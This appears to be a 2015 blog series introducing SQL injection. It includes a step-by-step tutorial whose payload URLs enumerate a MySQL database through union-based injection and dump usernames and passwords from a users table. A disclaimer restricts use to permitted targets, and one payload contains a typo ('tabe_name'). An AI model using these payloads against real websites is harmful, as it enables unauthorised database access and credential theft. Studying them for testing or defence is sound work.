Friday, 25 December 2015

SQL INJECTION --UNION BASED MYSQL INJECTION ---

UNION BASED MYSQL INJECTION ---
This blog is only educational purpose. please do not use the skills gained from this blog to harm or attack or even test otherwise/sites/etc to which you do not have the permission.it is illegal to do so.if you get caught & mind you (you would) then don't say that you did not know. you have been specially warned.
Step 1: find a dynamic page

site.com/page.php?x=y

Step 2: apply ' to check if website is vulnerable or not

site.com/page.php?xid=76'

now the websiite must give you some signs of error like:
SQL error, php error, custom error, page not found, page redirect, blank page, data missing from page, etc

Step 3: Confirm if website is vulnerabke and find the injection type 
(string / integer) by applying --+

site.com/page.php?xid=76'--+

if no error then injection type is string else try removing '

site.com/page.php?xid=76--+

now normal page should open and it means injection type is integer, if still it dosent try another link

NOTE* if injection type is string 

site.com/page.php?xid=76' [sql injection here]--+
      
      if injection type is integer

site.com/page.php?xid=76 [sql injection here]--+

Step 4: get the number of columns in current query using order by (assuming injection type string)

site.com/page.php?xid=76' order by 1--+  no error
site.com/page.php?xid=76' order by 2--+  no error
site.com/page.php?xid=76' order by 3--+  no error
.
.
site.com/page.php?xid=76' order by n--+   error

this means number of columns=n-1

Step 5: find the visibble/vulnerable columns (assuming no of columns=4)

site.com/page.php?xid=76' union select 1,2,3,4--+

now you must see some or all of these numbers (the number that are visible are vulnerable and can be used to get more info)

NOTE* if you dont see any numbers try putting a - sign

site.com/page.php?xid=-76' union select 1,2,3,4--+

if still no numbers then try another type of injection

Step 6: get the name of the database, version and mysql user (assuming column 2 and 3 are visible)

site.com/page.php?xid=76' union select 1,concat_ws(0x3a3a,database(),version(),user()),3,4--+

Step 7: get the names of the tables (assuming database name is xyz)

site.com/page.php?xid=76' union select 1,table_name,3,4 from information_schema.tables where table_schema='xyz' --+

note* if you only get a single row use group_concat(table_name) instead of table_name

Step 8: get the names of columns (assuming table name is users)

site.com/page.php?xid=76' union select 1,column_name,3,4 from information_schema.columns where table_schema='xyz' and tabe_name='users'--+

Step 9: get the data (assuming column name is user_name and user_pass)

site.com/page.php?xid=76' union select 1,group_concat(user_name,0x3a3a,user_pass),3,4 from xyz.users--+

Step 10: evil smile 3:)

     

Thursday, 24 December 2015

SQL INJECTION --- UNION BASED SQL INJECTION INTRODUCTION

SQL INJECTION --- UNION BASED SQL INJECTION INTRODUCTION
This blog is only educational purpose. please do not use the skills gained from this blog to harm or attack or even test otherwise/sites/etc to which you do not have the permission.it is illegal to do so.if you get caught & mind you (you would) then don't say that you did not know. you have been specially warned.



few commands that are used in UNION BASED SQL Injection ---

1.union () --
       The SQL UNION clause/operator is used to combine the results of two or more SELECT statements without returning any duplicate rows.

2.group_concat () --
        
     syntax --  group_concat (<column_name>)
       concats the data in all the rows of a column & put it in a single row separated by ','

3.Information_schema () ---( it is like a Index)
        It is a mother database that stored the data about data (metadata) like list of all tables,list of all columns ,the table a column belongs to the database a table, a table belongs to ,data data type of column etc etc...     

4.database () ---
        gets the name of the database presently in use.

5.order by X --
       syntax -- orderby <column no./name> 
       orders the output of select query according in ascending order of the data inside the specified column.

6.limit X,Y ---
       Limit always starts from 0 & gets 'Y' number of rows starting from the 'X+1' rows.

7.user() ---
        gets the MYSQL username of present user.

8.Version() ---
        gets the version of MYSQL installed.

TIPS ---

  • tables --- stores the information about tables.
  • column --- stores the information about column.
  • schemata --- stores the information about Database.       
 

Tuesday, 22 December 2015

SQL INJECTION INTRODUCTION

SQL INJECTION INTRODUCTION--

  • SQL Injection is the most common vulnerability on the internet.
  • It is mainly flaw in the web application & not a Database or web server issue.
  • most programmer are still not aware of this threat.
What is SQL Injection ????
  • Sql injection is a technique used to take advantage of non-validate Input vulnerabilities to pass SQL commands through a web Application for execution by back-end Database.
  • In Other words,Sql injection is a basic techniques /attack used to either gain unauthorised access to a database or to retrieve information directly from the Database.
SQL Injection Attacks ----
  1.  Authentication Bypass --- Using this attacks, an attacker logs on to an application without providing valid username & password & gain the administrative privileges.
  2. Information Disclosure --- Using this attacks, an attacker obtain the sensitive Information that is stored in the database. 
  3. Compromised Data Integrity --- An attacker uses this attack to deface a webpage ,insert malicious content into webpages , or alter the content of database. 
  4. Compromised Availability of Data --- An attacker use this attack to delete the database information logs or audit information that is contained in database. 
  5. Remote code Execution --- It allows an attacker to compromise the Host O.S.
How web Application Works ----


  • The above fig. shows how the initial request is triggered by the user through the browser over the Internet to the web application server. 
  • The web application accesses the databases servers to perform the requested task updating and retrieving the information lying within the database. 
  • The web application then presents the information to the user through the browser.
Web Security Issue ----




  • web applications do raise a number of security concerns stemming from improper coding. Serious weaknesses or vulnerabilities, allow hackers to gain direct and public access to databases in order to sensitive data.
  • Many of these databases contain valuable information (e.g., personal and financial details) making them a frequent target of hackers
  • Websites and related web applications must be available 24 hours a day, 7 days a week, to provide the required service to customers, employees, suppliers and other stakeholders.
  • Firewalls and SSL provide no protection against web application hacking, simply because access to the website has to be made public – All modern database systems (e.g. Microsoft SQL Server, Oracle and MySQL) may be accessed through specific ports (e.g., port 80 and 443) and anyone can attempt direct connections to the databases effectively bypassing the security mechanisms used by the operating system. These ports remain open to allow communication with legitimate traffic and therefore constitute a major vulnerability.
  • Web applications often have direct access to back-end data such as customer databases and, hence, control valuable data and are much more difficult to secure. Those that do not have access will have some form of script that allows data capture and transmission. If a hacker becomes aware of weaknesses in such a script, he may easily reroute unwitting traffic to another location and illegitimately hive off personal details.
  • Most web applications are custom-made and, therefore, involve a lesser degree of testing than off-the-shelf software. Consequently, custom applications are more susceptible to attack.
Types  of SQL Injection ---
There are mainly TWO types of SQL injection ----
1. Simple SQL Injection 
  • Union SQL Injection
  • Error Based SQL Injection.

2.Blind SQL Injection 

okk....now the types of SQL injection related information I will post in My next blog...so GooD ByE frds....